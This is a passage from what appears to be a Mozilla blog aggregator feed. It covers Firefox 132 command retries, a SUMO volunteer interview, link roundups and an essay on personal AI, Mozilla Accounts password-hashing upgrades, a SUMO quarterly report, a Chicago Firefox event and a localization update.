Internally, we sometimes need to forward commands to content processes. This can easily fail, particularly when targeting a page which was either newly created or in the middle of a navigation. These failures often result in errors such as "AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved".

<- {
  "type":"error",
  "id":14,
  "error":"unknown error",
  "message":"AbortError: Actor 'MessageHandlerFrame' destroyed before query 'MessageHandlerFrameParent:sendCommand' was resolved",
  "stacktrace":""
}

While there are valid technical reasons that prevent command execution in some cases, there are also many instances where retrying the command is a feasible solution.

The browsingContext.setViewport command was specifically updated in order to retry an internal command, as it was frequently failing. Then we updated our overall implementation in order to retry commands automatically if we detect that the page is navigating or about to navigate. Note that retrying commands is not entirely new, it’s an internal feature we were already using in a few handpicked commands. The changes in Firefox 132 just made its usage much more prevalent.

New preference: remote.retry-on-abort

To go one step further, we decided to allow all commands to be retried by default when the remote.retry-on-abort preference is set to true. Note that true is the default value, which means that with Firefox 132, all commands which need to reach the content process might now be retried (documentation). If you were previously relying on or working around the aforementioned AbortError, and notice an unexpected issue with Firefox 132, you can update this preference to make the behavior closer to previous Firefox versions. Please also file a Bug to let us know about the problem.

Bug fixes

Support.Mozilla.OrgContributor spotlight – Michele Rodaro

Hi Mozillians,

In today’s edition, I’d like to introduce you all to Michele Rodaro, a locale leader for Italian in the Mozilla Support platform. He is a professional architect, but finding pleasure and meaning in contributing to Mozilla since 2006. I’ve met him on several occasions in the past, and reading his answers feels exactly like talking to him in real life. I’m sure you can sense his warmth and kindness just by reading his responses. Here’s a beautiful analogy from Michele about his contributions to Mozilla as they relate to his background in architecture:

I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority.

Q: Hi Michele, can you tell us more about yourself and what keeps you busy these days?

I live in Gemona del Friuli, a small town in the Friuli Venezia Giulia region, in the north-east of Italy, bordering Austria and Slovenia. I am a freelance architect, having graduated from Venice’s University many years ago. I own a professional studio and I mainly deal with residential planning, renovations, and design. In my free time I like to draw, read history, art, literature, satire and comics, listen to music, take care of my cats and, of course, translate or update SUMO Knowledge Base articles into Italian.

When I was younger, I played many sports (skiing, basketball, rugby, and athletics). When I can, I continue to go skiing in the beautiful mountains of my region. Oh, I also played piano in a jazz rock band I co-founded in the late 70s and early 80s (good times). In this period, from a professional point of view, I am trying to survive the absurd bureaucracy that is increasingly oppressive in my working environment. As for SUMO, I am maintaining the Italian KB at 100% of the translations, and supporting new localizers to help them align with our translation style.

Q: You get started with the Italian local forum in 2006 before you expand your contribution to SUMO in 2008. Can you tell us more about what are the different types of contributions that you’re doing for Mozilla?

I found out about Firefox in November 2005 and discovered the Mozilla Italia community and their support forum. Initially, I used the forum to ask for help from other volunteers and, after a short time, I found myself personally involved in providing online assistance to Italian users in need. Then I became a moderator of the forum and in 2008, with the help of my friend @Underpass, I started contributing to the localization of SUMO KB articles (the KB was born in that year). It all started like that.

Today, I am an Italian locale leader in SUMO. I take care of the localization of KB articles and train new Italian localizers. I continue to provide support to users on the Italian forums and when I manage to solve a problem I am really happy, but my priority is the SUMO KB because it is an essential source to help users who search online for an immediate solution to any problem encountered with Firefox on all platforms and devices or with Thunderbird, and want to learn the various features of Mozilla applications and services. Forum support has also benefited greatly from KB articles because, instead of having to write down all the procedures to solve a user’s problem every time, we can simply provide them with the link to the article that could solve the problem without having to write the same things every time, especially when the topic has already been discussed many times, but users have not searched our forum.

Q: In addition to translating articles on SUMO, you’re also involved in product translation on Pontoon. With your experience across both platforms, what do you think SUMO can learn from Pontoon, and how can we improve our overall localization process?

I honestly don’t know, they are quite different ways of doing things in terms of using translation tools specifically. I started collaborating with Pontoon’s Italian l10n team in 2014… Time flies… The rules, the style guides, and the QA process adopted for the Italian translations on Pontoon are the same ones we adopted for SUMO. I have to say that I am much more comfortable with SUMO’s localization process and tool, maybe because I have seen it start off, grow and evolve over time. Pontoon introduced Pretranslation, which helps a lot in translating strings, although it still needs improvements. A machine translation of strings that are not already in Pontoon’s “Translation Memory” is proposed. Sometimes that works fine, other times we need to correct the proposal and save it after escalating it on GitHub, so that in the future that translation becomes part of the “Translation Memory”. If the translation of a string is not accurate, it can be changed at any time.

I don’t know if it can be a solution for some parts of SUMO articles. We already have templates, maybe we should further implement the creation and use of templates, focusing on this tool, to avoid typing the translation of procedures/steps that are repeated identically in many articles.

Q: What are the biggest challenges you’re currently facing as a SUMO contributor? Are there any specific technical issues you think should be prioritized for fixing?

Being able to better train potential new localizers, and help infuse the same level of passion that I have in managing the Italian KB of SUMO. As for technical issues, staying within the scope of translating support articles, I do not encounter major problems in terms of translating and updating articles, but perhaps it is because I now know the strengths and weaknesses of the platform’s tools and I know how to manage them.

Maybe we could find a way to remedy what is usually the most frustrating thing for a contributor/localizer who, for example, is updating an article directly online: the loss of their changes after clicking the “Preview Content” button. That is when you click on the “Preview Content” button after having translated an article to correct any formatting/typing errors. If you accidentally click a link in the preview and don’t right-click the link to select “Open Link in New Tab” from the context menu, the link page opens replacing/overwriting the editing page and if you try to go back everything you’ve edited/translated in the input field is gone forever… And you have to start over. A nightmare that happened to me more than once often because I was in a hurry. I used to rely on a very good extension that saved all the texts I typed in the input fields and that I could recover whenever I wanted, but it is no longer updated for the newer versions of Firefox. I’ve tried others, but they don’t convince me. So, in my opinion, there should be a way to avoid this issue without installing extensions. I’m not a developer, I don’t know if it’s easy to find a solution, but we have Mozilla developers who are great ;)

Maybe there could be a way to automatically save a draft of the edit every “x” seconds to recover it in case of errors with the article management. Sometimes, even the “Preview Content” button could be dangerous. If you accidentally lost your Internet connection and didn’t notice, if you click on that button, the preview is not generated, you lose everything and goodbye products!

Q: Your background as a freelance architect is fascinating! Could you tell us more about that? Do you see any connections between your architectural work and your contribution to Mozilla, or do you view them as completely separate aspects of your life?

As an architect I can only speak from my personal experience, because I live in a small town, in a beautiful region which presents me with very different realities than those colleagues have to deal with in big cities like Rome or Milan. Here everything is quieter, less frenetic, which is sometimes a good thing, but not always. The needs of those who commission a project are different if you have to carry it out in a big city, the goal is the same but, urban planning, local building regulations, available spaces in terms of square footage, market requests/needs, greatly influence the way an architect works. Professionally I have had many wonderful experiences in terms of design and creativity (houses, residential buildings, hotels, renovations of old rural or mountain buildings, etc.), challenges in which you often had to play with just a centimeter of margin to actually realize your project.

Connection between architecture and contribution to Mozilla? Good question. I see my contribution to Mozilla a bit like participating in the realization of a project, the tools change but I believe the final goal is the same: helping to build a beautiful house where people feel comfortable, where they live well, where there are common spaces, but also personal spaces where privacy must be the priority. If someone wants our “cookies” and unfortunately often not only those, they have to knock, ask permission and if we do not want to have intrusive guests, that someone has to turn around, go away and let us do our things without sticking their nose in. This is my idea of ​​Mozilla, this is the reason that pushed me to believe in its values ​​(The user and his privacy first) and to contribute as a volunteer, and this is what I would like to continue to believe even if someone might say that I am naive, that “they are all the same”.

My duty as an architect is like that of a good parent, when necessary I must always warn my clients about why I would advise against certain solutions that I, from professional experience, already know are difficult to implement or that could lead to future management and functionality problems. In any case I always look for solutions that can satisfy my clients’ desires. Design magazines are beautiful, but it is not always possible to reproduce a furnishing solution in living environments that are completely different from the spaces of a showroom set up to perfection for a photo shoot… Mozilla must continue to do what it has always done, educate and protect users, even those who do not use its browser or its products, from those “design magazines” that could lead them to inadvertently make bad choices that they could regret one day.

Q: Can you tell us more about the Italian locale team in SUMO and how do you collaborate with each other?

First of all, it’s a fantastic team! Everyone does what they do best, there are those who help users in need on the forums, those who translate, those who check the translations and do QA by reporting things that need to be corrected or changed, from punctuation errors to lack of fluency or clarity in the translation, those who help with images for articles because often the translator needs the specific image for an operating system that he does not have.

As for translations, which is my main activity, we usually work together with 4- 5 collaborators/friends, and we use a consolidated procedure. Translation of an article, opening a specific discussion for the article in the forum section dedicated to translations with the link of the first translation and the request for QA. Intervention of anyone who wants to report/suggest a correction or a change to be made, modification, link to the new revised version based on the suggestions, rereading and if everything is ok, approval and publication. The translation section is public — like all the other sections of the Mozilla Italia forum — and anyone can participate in the discussion.

We are all friends, volunteers, some of us know each other only virtually, others have had the chance to meet in person. The atmosphere is really pleasant and even when a discussion goes on too long, we find a way to lighten the mood with a joke or a tease. No one acts as the professor, we all learn something new. Obviously, there are those like me who are more familiar with the syntax/markup and the tools of the SUMO Wiki and those who are less, but this is absolutely not a problem to achieve the final result which is to provide a valid guide to users.

Q: Looking back on your contribution to SUMO, what was the most memorable experience for you? Anything that you’re most proud of?

It’s hard to say… I’m not a tech geek, I don’t deal with code, scripts or computer language so my contribution is limited to translating everything that can be useful to Italian users of Mozilla products/programs. So I would say: the first time I reached the 100% translation percentage of all the articles in the Italian dashboard. I have always been very active and available over the years with the various Content Managers of SUMO. When I received their requests for collaboration, I did tests, opened bugs related to the platform, and contributed to the developers’ requests by testing the procedures to solve those bugs.

As for the relationship with the Mozilla community, the most memorable experience was undoubtedly my participation in the Europe MozCamp 2009 in Prague, my “first time”, my first meeting with so many people who then became dear friends, not only in the virtual world. I remember being very excited about that invitation and fearful for my English, which was and is certainly not the best. An episode: Prague, the first Mozilla talk I attended. I was trying to understand as much as possible what the speaker was saying in English. I heard this strange word “eltenen… eltenen… eltenen” repeated several times. What did it mean? After a while I couldn’t take it anymore, I turned to an Italian friend who was more expert in the topics discussed and above all who knew the English language well. Q: What the hell does “eltenen” mean? A: “Localization”. Q: “Localization???” A: “l10n… L ten n… L ocalizatio n”. Silence, embarrassment, damn acronyms!

How could I forget my first trip outside of Europe to attend the Mozilla Summit in Whistler, Canada in the summer of 2010? It was awesome, I was much more relaxed, decided not to think about the English language barrier and was able to really contribute to the discussions that we, SUMO localizers and contributors from so many countries around the world, were having to talk about our experience, try to fix the translation platform to make it better for us and discuss all the potential issues that Firefox was having at the time. I really talked a lot and I think the “Mozillians” I interacted with even managed to understand what I was saying in English :)

The subsequent meetings, the other All Hands I attended, were all a great source of enthusiasm and energy! I met some really amazing people!

Q: Lastly, can you share tips for those who are interested in contributing to Italian content localization or contributing to SUMO in general?

Every time a new localizer starts collaborating with us I don’t forget all the help I received years ago! I bend over backwards to put them at ease, to guide them in their first steps and to be able to transmit to them the same passion that was transmitted to me by those who had to review with infinite patience my first efforts as a localizer. So I would say: first of all, you must have passion and a desire to help people. If you came to us it’s probably because you believe in this project, in this way of helping people. You can know the language you are translating from very well, but if you are not driven by enthusiasm everything becomes more difficult and boring. Don’t be afraid to make mistakes, if you don’t understand something ask, you’re among friends, among traveling companions. As long as an article is not published we can correct it whenever we want and even after publication. We were all beginners once and we are all here to learn. Take an article, start translating it and above all keep it updated.

If you are helping on the support forums, be kind and remember that many users are looking for help with a problem and often their problems are frustrating. The best thing to do is to help the user find the answer they are looking for. If a user is rude, don’t start a battle that is already lost. You are not obligated to respond, let the moderators intervene. It is not a question of wanting to be right at all costs but of common sense.

 

Don Martilinks for 29 Oct 2024

Satire Without Purpose Will Wander In Dark Places Broadly labelling the entirety of Warhammer 40,000 as satire is no longer sufficient to address what the game has become in the almost 40 years since its inception. It also fails to answer the rather awkward question of why, exactly, these fascists who are allegedly too stupid to understand satire are continually showing up in your satirical community in the first place.

Why I’m staying with Firefox for now – Michael Kjörling [T]he most reasonable option is to keep using Firefox, despite the flaws of the organization behind it. So far, at least these things can be disabled through settings (for example, their privacy-preserving ad measurement), and those settings can be prepared in advance.

Google accused of shadow campaigns redirecting antitrust scrutiny to Microsoft, Google’s Shadow Campaigns (so wait a minute, Microsoft won’t let companies use their existing Microsoft Windows licenses for VMs in the Google cloud, and Google is doing a sneaky advocacy campaign? Sounds like content marketing for Amazon Linux®

Scripting News My friends at Automattic showed me how to turn on ActivityPub on a WordPress site. I wrote a test post in my simple WordPress editor, forgetting that it would be cross-posted to Mastodon. When I just checked in on Masto, there was the freaking post. After I recovered from passing out, I wondered what happens if I update the post in my editor, and save it to the WordPress site that’s hooked up to Masto via ActivityPub. So I made a change and saved it. I waited and waited, nothing happened. I got ready to add a comment saying ahh I guess it doesn’t update, when—it updated. (Like being happy when a new web site opening in a new browser, a good sign that ActivityPub is the connecting point for this kind of connected innovation.) Related: The Web Is a Customer Service Medium (Ftrain.com) by Paul Ford.

China Telecom’s next 150,000 servers will mostly use local processors Among China Telecom’s server buys this year are machines running processors from local champion Loongson, which has developed an architecture that blends elements of RISC-V and MIPS.

Removal of Russian coders spurs debate about Linux kernel’s politics Employees of companies on the Treasury Department’s Office of Foreign Assets Control list of Specially Designated Nationals and Blocked Persons (OFAC SDN), or connected to them, will have their collaborations subject to restrictions, and cannot be in the MAINTAINERS file.

The TikTokification of Social Media May Finally Be Its Undoing by Julia Angwin. If tech platforms are actively shaping our experiences, after all, maybe they should be held liable for creating experiences that damage our bodies, our children, our communities and our democracy.

Cheap Solar Panels Are Changing the World The latest global report from the International Energy Agency (IEA) notes that solar is on track to overtake all other forms of energy by 2033.

Conceptual models of space colonization - Charlie’s Diary (one more: Kurt Vonnegut’s concept for spreading genetic material)

(protip: you can always close your browser tabs with creepy tech news, there will be more in a few minutes… Location tracking of phones is out of control. Here’s how to fight back. LinkedIn fined $335 million in EU for tracking ads privacy breaches Pinterest faces EU privacy complaint over tracking ads Dems want tax prep firms charged for improper data sharing Dow Jones says Perplexity is “freeriding,” sues over copyright infringement You Have a ‘Work Number’ on This Site, and You Should Freeze It Roblox stock falls after Hindenburg blasts the social gaming platform over bots and pedophiles)

It Was Ten Years Ago Today that David Rosenthal predicted that cryptocurrency networks will be dominated by a few, perhaps just one, large participant.

Writing Projects (good start for a checklist before turning in a writing project. Maybe I should write Git hooks for these.)

Word.(s). (Includes some good vintage car ads. Remember when most car ads were about the car, not just buttering up the driver with how successful you must be to afford this thing?)

Social Distance and the Patent System [I]t was clear from our conversation that [Judge Paul] Michel doesn’t have a very deep understanding of the concerns of many in the software industry. And, more to the point, he clearly wasn’t very interested in understanding those concerns better or addressing them. On a theoretical level, he knew that there was a lot of litigation in the software industry and that a lot of people were upset about it. But like Fed and the unemployment rate, this kind of theoretical knowledge doesn’t always create a sense of urgency. One has to imagine that if people close to Michel—say, a son who was trying to start a software company—were regularly getting hit by frivolous patent lawsuits, he would suddenly take the issue more seriously. But successful software entrepreneurs are a small fraction of the population, and most likely no judges of the Federal Circuit have close relationships with one.

(Rapids is the script that gathers these, and it got a clean bill of health from the feed reader score report after I fixed the Last-Modified/If-Modified-Since and Etag handling. So expect more link dump posts here, I guess.)

Wil ClouserMozilla Accounts password hashing upgrades

We’ve recently finished two significant changes to how Mozilla Accounts handles password hashes which will improve security and increase flexibility around changing emails. The changes are entirely transparent to end-users and are applied automatically when someone logs in.

Randomizing Salts

If a system is going to store passwords, best practice is to hash the password with a unique salt per row. When accounts was first built we used an account’s email address as the unique salt for password hashing. This saved a column in the database and some bandwidth but overall I think was a poor idea. It meant people couldn’t re-use their email addresses and it leaves PII sitting around unnecessarily.

Instead, a better idea is just to generate a random salt. We’ve now transitioned Mozilla Accounts to random salts.

Increasing Key Stretching Iterations

Eight years ago Ryan Kelly filed bug 1320222 to review Mozilla Accounts’ client-side key stretching capabilities and sparked a spirited conversation about iterations and the priority of the bug. Overall, this is routine maintenance - we expect any amount of stretching we do will have to be revisited periodically due to hardware improving and the value we choose is a compromise between security and time to login, particularly on older hardware.

Since we were generating new hashes for the random salts already we took the opportunity to increase our PBKDF2 iterations from 1000 to 650000 – a number we’re seeing others in the industry using. This means logging in with slower hardware (like older mobile phones) may be noticeably slower. Below is an excerpt from the analysis we did showing a Macbook from 2007 will take an additional ~3 seconds to log in:

Key Stretch Iterations Overhead on 2007 Macbook Overhead on 2021 MacBook Pro M1
100,000 0.4800024 seconds 0.00000681 seconds
200,000 0.9581234 seconds 0.00000169 seconds
300,000 1.4539928 seconds 0.00000277 seconds
400,000 1.9337903 seconds 0.00029750 seconds
500,000 2.4146366 seconds 0.00079127 seconds
600,000 2.9482827 seconds 0.00112186 seconds
700,000 3.3960513 seconds 0.00117956 seconds
800,000 3.8675677 seconds 0.00117956 seconds
900,000 4.3614942 seconds 0.00141616 seconds

Implementation

Dan Schomburg did the heavy lifting to make this a smooth and successful project. He built the v2 system alongside v1 so both hashes are generated simultaneously and if the v2 exists the login system will use that. This lets us roll the feature out slowly and gives us control if we need to disable it or roll back.

We tested the code for several months on our staging server before rolling it out in production. When we did enable it in production it was over the course of several weeks via small percentages while we watched for unintended side-effects and bug reports.

I’m pleased to say everything appers to be working smoothly. As always, if you notice any issues please let us know.

Don Martitypefaces that aren’t on this blog (yet?)

Right now I’m not using these, but they look useful and/or fun.

  • Departure Mono: vintage-looking, pixelated, lo-fi technical vibe.

  • Atkinson Hyperlegible Font was carefully developed by the Braille Institute to help low-vision readers. It improves legibility and readability through clear, and distinctive letters and numbers.

I’m trying to keep this site fairly small and fast, so getting by with Modern Font Stacks as much as possible.

Related

colophon

Bonus links

(these are all web development, editing, and business, more or less. Yes, I’m still working on my SCALE proposal, deadline coming up.)

Before you buy a domain name, first check to see if it’s haunted

Discover Wiped Out MFA Spend By Following These Four Basic Steps (This headline underrates the content. If all web advertisers did these tips, then 90% of the evil stuff on the Internet would be gone—most of the web’s problems are funded by advertisers and agencies who fail to pay attention to the context in which their ads appear.)

Janky remote backups without root on the far end

My solar-powered and self-hosted website

Let’s bring back browsing

Hell Gate NYC doubled its subscription revenue in its second year as a worker-owned news outlet

Is Matt Mullenweg defending WordPress or sabotaging it?

Gosub – An open-source browser engine

Take that

Thunderbird Android client is K-9 Mail reborn, and it’s in solid beta

A Bicycle for the Mind – Prologue

Why I Migrated My Newsletter From Substack to Eleventy and Buttondown - Richard MacManus

My Blog Engine is the Erlang Build Tool

A Developer’s Guide to ActivityPub and the Fediverse

Don Martipersonal AI in the rugpull economy

Doc Searls writes, in Personal Agentic AI,

Wouldn’t it be good for corporate AI agents to have customer hands to shake that are also equipped with agentic AI? Wouldn’t those customers be better than ones whose agency is merely human, and limited to only what corporate AI agents allow?

The obvious answer for business decision-makers today is: lol, no, a locked-in customer is worth more. If, as a person who likes to watch TV, you had an AI agent, then the agent could keep track of sports seasons and the availability of movies and TV shows, and turn your streaming subscriptions on and off. In the streaming business, like many others, the management consensus is to make things as hard and manual as possible on the customer side, and save the automation for the company side. Just keeping up with watching a National Football League team is hard…even for someone who is ON the team. Automation asymmetry, where the seller gets to reduce service costs while the customer has to do more and more manual work, is seen as a big win by the decision-makers on the high-automation side.

Big company decision-makers don’t want to let smaller companies have their own agentic tools, either. Getting a DMCA Exemption to let McDonald’s franchisees fix their ice cream machines was a big deal that required a lengthy process with the US Copyright Office. Many other small businesses are locked in to the manual, low-information side of a business relationship with a larger one. (Web advertising is another example. Google shoots at everyone’s feet, and agencies, smaller firms, and browser extension developers dance.)Google employees and shareholders would be better off if it were split into two companies that could focus on useful projects for independent customers who had real choices.

The first wave of user reactions to AI is happening, and it’s adversarial. Artists on sites like DeviantArt went first, and now Reddit users are deliberately posting fake answers to feed Google’s AI. On the shopping side, avoiding the output of AI and made-for-AI deceptive crap is becoming a must-have mainstream skill, as covered in How to find helpful content in a sea of made-for-Google BS and How Apple and Microsoft’s trusted brands are being used to scam you. As Baldur Bjarnason writes,

The public has for a while now switched to using AI as a negative—using the term artificial much as you do with artificial flavouring or that smile’s artificial. It’s insincere creativity or deceptive intelligence.

Other news is even worse. In today’s global conflict between evil oligarchs and everyone else, AI is firmly aligned with the evil oligarch side.

But today’s Big AI situation won’t last. Small-scale and underground AI has sustainable advantages over the huge but money-losing contenders. And it sounds like Doc is already thinking post-bubble.

Adversarial now, but what about later?

So how do we get from the AI adversarial situation we have now to the win-win that Doc is looking for? Part of the answer will be resolving the legal issues. Today’s Napster-like free-for-all environment won’t persist, so eventually we will have an AI scene in which companies that want to use your work for training have to get permission and disclose provenance.

The other part of the path from today’s situation—where big companies have AI that enables scam culture and chickenization while individuals and small companies are stuck rowing through funnels and pipelines—is personal, aligned AI that balances automation asymmetries. Whether it’s solving CAPTCHAs, getting data in hard-to-parse formats, or other awkward mazes, automation asymmetries mean that as a customer, you technically have more optionality than you practically have time to use. But AI has a lot more time. If a company gives you user experience grief, with the right tools you can get back to where you would have been if they had applied less obfuscation in the first place. (icymi: Video scraping: extracting JSON data from a 35 second screen capture for less than 1/10th of a cent Not a deliberate obfuscation example, but an approach that can be applied.)

So we’re going to see something like this AI cartoon by Tom Fishburne (thanks to Doc for the link) for privacy labour. Companies are already getting expensive software-as-a-service to make privacy tasks harder for the customers, which means that customers are going to get AI services to make it easier. Eventually some companies will notice the extra layers, pay attention to the research, and get rid of the excess grief on their end so you can stop running de-obfuscation on your end. That will make it work better for everyone. (GPC all the things! Data Rights Protocol)

The biggest win from personal AI will, strangely enough, be in de-personalizing your personal information environment. By doing the privacy labour for you, the agentic AI will limit your addressability and reduce personalization risks. The risks to me from buying the less suitable of two legit brands are much lower than the risk of getting stuck with some awful crap that was personalized to me and not picked up on by norms enforcers like Consumer Reports. Getting more of my privacy labour done for me will not just help me personally do better #mindfulConsumption, but also increase the rewards for win-win moves by sellers. Personalization might be nifty, but filtering out crap and rip-offs is a bigger immediate win: Sunday Internet optimism Doc writes, When you limit what customers can bring to markets, you limit what can happen in those markets. As far as I can tell, the real promise for agentic AI isn’t just in enabling existing processes or making them more efficient. It’s in establishing a credible deterrent to enshittification—if you’re trying to rip me off, don’t talk to me, talk to my bot army.

For just a minute, put yourself in the shoes of a product manager with a proposal for some legit project that they’re trying to get approved. If that proposal is up against a quick win for the company, like one based on creepy surveillance, it’s going to lose. But if the customers have the automation power to lower the ROI from creepy growth hacking, the legit project has a chance. And that pushes up the long-term value of the entire company. An individual locked-in customer is more valuable to the brand than an individual independent customer, but a brand with independent customers is more valuable than a brand with an equal number of locked-in customers.

Anyway, hope to see you at VRM Day.

Bonus links

Space is Dead. Why Do We Keep Writing About It?

It’s Time to Build the Exoplanet Telescope

The tech startups shaking up construction in Europe

Support.Mozilla.OrgWhat’s up with SUMO – Q3 2024

Each quarter, we gather insights on all things SUMO to celebrate our team’s contributions and showcase the impact of our work.

The SUMO community is powered by an ever-growing global network of contributors. We are so grateful for your contributions, which help us improve our product and support experiences, and further Mozilla’s mission to make the internet a better place for everyone.

This quarter we’re modifying our update to highlight key takeaways, outline focus areas for Q4, and share our plans to optimize our tools so we can measure the impact of your contributions more effectively.

Below you’ll find our report organized by the following sections: Q3 Highlights at-a-glance, an overview of our Q4 Priorities & Focus Areas, Contributor Spotlights and Important Dates, with a summary of special events and activities to look forward to! Let’s dive right in:

Q3 Highlights at-a-glance

Forums: We saw over 13,000 questions posted to SUMO in Q3, up 83% from Q2. The increased volume was largely driven by the navigation redesign in July.

  • We were able to respond to over 6,300 forum questions, a 49% increase from Q2!
  • Our response rate was ~15 hours, which is a one-hour improvement over Q2, with a helpfulness rating of 66%.
  • August was our busiest and most productive month this year. We saw more than 4,300 questions shared in the forum, and we were able to respond to 52.7% of total in-bounds.
  • Trends in forum queries included questions about site breakages, account and data recovery concerns, sync issues, and PPA feedback.

Knowledge Base: We saw 473 en-US revisions from 45 contributors, and more than 3,000 localization revisions from 128 contributors which resulted in an overall helpfulness rating of 61%, our highest quarterly average rating YTD!

  • Our top contributor was AliceWyman. We appreciate your eagle eyes and dedication to finding opportunities to improve our resources.
  • For localization efforts, our top contributor was Michele Rodaro. We are grateful for your time, efforts and expert language skills.

Social: On our social channels, we interacted with over 1,100 tweets and saw more than 6,000 app reviews.

  • Our top contributor on Twitter this quarter was Isaac H who responded to over 200 tweets, expertly navigating our channels to share helpful resources, provide troubleshooting support, and help redirect feature requests to Mozilla Connect. Thank you, Isaac!
  • On the play store, our top contributor was Dmitry K who replied to over 400 reviews! Thank you for giving helpful feedback, advice and for providing such a warm and welcoming experience for users.

SUMO platform updates: There were 5 major platform updates in Q3. Our focus this quarter was to improve navigation for users by introducing new standardized topics across products, and update the forum moderation tool to allow our support agents to moderate these topics for forum posts. Categorizing questions more accurately with our new unified topics will provide us with a foundation for better data analysis and reporting.

We also introduced improvements to our messaging features, localized KB display times, fixed a bug affecting pageviews in the KB dashboard, and added a spam tag to make moderation work easier for the forum moderators.

We acknowledge there was a significant increase in spam questions that began in July which is starting to trend downwards. We will continue to monitor the situation closely, and are taking note of moderator recommendations on a future resolution. We appreciate your efforts to help us combat this problem!

Check out SUMO Engineering Board to see what the platform team is cooking up in the engine room. You’re welcome to join our monthly Community Calls to learn more about the latest updates to Firefox and chat with the team.

Firefox Releases: We released Firefox 128, Firefox 129 and Firefox 130 in Q3 and we made significant updates to our wiki template for the Firefox train release.

Q4 Priorities & Focus Areas

  • CX: Enhancing the user experience and streamlining support operations.
  • Kitsune: Improved article helpfulness survey and tagging improvements to help with more granular content categorization.
  • SUMO: For the rest of 2024, we’re working on an internal SUMO Community Report, FOSDEM 2025 preparation, Firefox 20th anniversary celebration, and preparing for an upcoming Community Campaign around QA.

Contributor Spotlights

We have seen 37 new contributors this year, with 10 new contributors joining the team this quarter. Among them, ThePillenwerfer, Khalid, Mozilla-assistent, and hotr1pak, who shared more than 100 contributions between July–September. We appreciate your efforts!

Cheers to our top contributors this quarter:

SUMO top contributors in Q3

Our multi-channel contributors made a significant impact by supporting the community across more than one channel (and in some cases, all three!) 

All in all it was an amazing quarter! Thanks for all you do.

Important dates

  • October 29th: Firefox 132 will be released
  • October 30th: RSVP to join our next Community Call! All are welcome. We do our best to create a safe space for everyone to contribute. You can join on video or audio, at your discretion. You are also welcome to share questions in advance via the contributor forum, or our Matrix channel.
  • November 9th: Firefox’s 20th Birthday!
  • November 14th Save the date for an AMA with the Firefox leadership team
  • FOSDEM ’25: Stay tuned! We’ll put a call out for volunteers and for talks in early November

Stay connected

Thanks for reading! If you have any feedback or recommendations on future features for this update, please reach out to Kiki and Andrea.

The Mozilla BlogCelebrating Chicago’s creators and small businesses at Firefox’s ‘Free to Browse’ event

With winter on the horizon, Chicago is ready to show that nothing — not wind, nor snow — can cool the fire of a united community. 

As we toast Firefox’s 20th anniversary, we’re hosting “Free to Browse: Celebrating Chicago’s Creatives,” an IRL browsing experience to amplify the voices of 20 local creators and small businesses. The event will explore how they’re creatively impacting their communities, as well as showcase the innovation that has defined the last 20 years of Firefox’s journey. We’re teaming up with these 20 local small businesses as part of our national campaign “Nothing Personal, Just Browsing,” which highlights that when you choose Firefox, you choose a more private online experience. 

“Free to Browse” is free and open to the public and will take place Nov. 16 from 4:00 p.m. to 10:30 p.m. CT at Inside Town, a local art collective in Chicago that celebrates diverse artists. The three-story space will bring the online world to life through a completely immersive experience. Guests can “browse” the skills of the featured small businesses, explore their services and shop for exclusive items, goods and more. It’ll be an engaging environment featuring musical performances and interactive art while celebrating Firefox’s impactful journey and technological legacy. We’re all about making the web a private and safe open space for everyone, and there’s no better way to cultivate that than with music, art, food and community.

The best parts of the internet are built by the communities that shape them. We’re proud to celebrate these 20 bold and innovative businesses in Chicago that, like Firefox, are community-focused and not afraid to be different and challenge the status quo: 

1. Lon Renzell, music producer/engineer and the founder of Studio SHAPES, a recording studio for musical creativity. | @renzell.wav

2. Kevin Woods, founder of streetwear brand and re-sale store, “The Pop Up.” @ogkwoods 

3. Tatum Lynea, executive pastry chef and partner, named Chicago’s 2024 pastry chef of the year. |  @tatumlynea

4. Demir Mujagic, founder of Published Studios, a specialty design/print boutique. | @published.studios 

5. Prosper Bambo, founder of Congruent Space, an interactive platform integrating art, design and fashion. | @prosperbambo

6. Akele Parnell, co-founder of ÜMI Farms, a cannabis ecosystem which includes craft brands and retail dispensaries. | @akele_j 

7. Makafui Searcy, conceptual designer and founding director of the Fourtunehouse Art Center. | @makafuikofisearcy

8. Oluwaseyi Adeleke, creative director and fashion designer, focused on storytelling through a Black lens. | @olu.originals 

9. Manny Mendoza, co-founder and chef of Herbal Notes, a cannabis lifestyle and experience collective. | @chefmanofrom18th

10. Angelica Rivera, founder of Semillas, a Mexican and Puerto Rican-owned floral design, plant, event experiences and coffee shop. | @sincerelyanngee  

11. Kristoffer McAfee, artist/designer/traveler/scholar/business owner. | @km_designhq

12. Damiane Nickles, painter/marketer and founder of “Not A Plant Shop.” | @notaplantshop

13. Danielle Moore, founder and creative director of Semicolon Books. | @danni.aint.write

14. Trevor Holloway, founder of Inside Town art collective. | @trevorholloway

15. Nicole Humphrey, creative consultant and founder of NAHcreate. | @childofgenius

16. Jason Ivy, singer-songwriter, actor and filmmaker. | @thejasonivy

17. Jackson Flores, co-founder of DishRoulette Kitchen, an SMB development center dedicated to addressing economic inequality. | @jacksonsays

18. Andre Muir, visual artist and filmmaker. | @andremuir

19. Diana Pietrzyk, multidimensional creative, designer and artist.  | @dyanapyehchek

20. Preme, interdisciplinary artist, co-founder of Congruent Space and art director for Chicago music collective Goodbye Tomorrow. | @preme___xy 

Here’s a preview of the art these brilliant creators will have on display at the event:

This celebration isn’t just about the past 20 years of Firefox. It’s a stepping stone for the next 20 years of building an open and accessible internet for all. We’re excited to kick it off with an unforgettable experience in Chicago.

See you there!

Get Firefox

Get the browser that protects what’s important

The post Celebrating Chicago’s creators and small businesses at Firefox’s ‘Free to Browse’ event appeared first on The Mozilla Blog.

Mozilla Localization (L10N)L10n report: October 2024 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

New community/locales added

We’re grateful for the Abzhaz community’s initiative in reaching out to localize our products. Thank you for your valuable involvement!

New content and projects

What’s new or coming up in Firefox desktop

Search Mode Switcher

A new feature in development has become available (behind a flag) with the release of the latest Nightly version 133: the Search Mode Switcher. You may have already seen strings for this land in Pontoon, but this feature enables you to enter a search term into the address bar and search through multiple engines. After entering the search term and selecting a provider, the search term will persist (instead of showing the site’s URL) and then you can select a different provider by clicking an icon on the left of the bar.

Firefox Search Mode Switcher

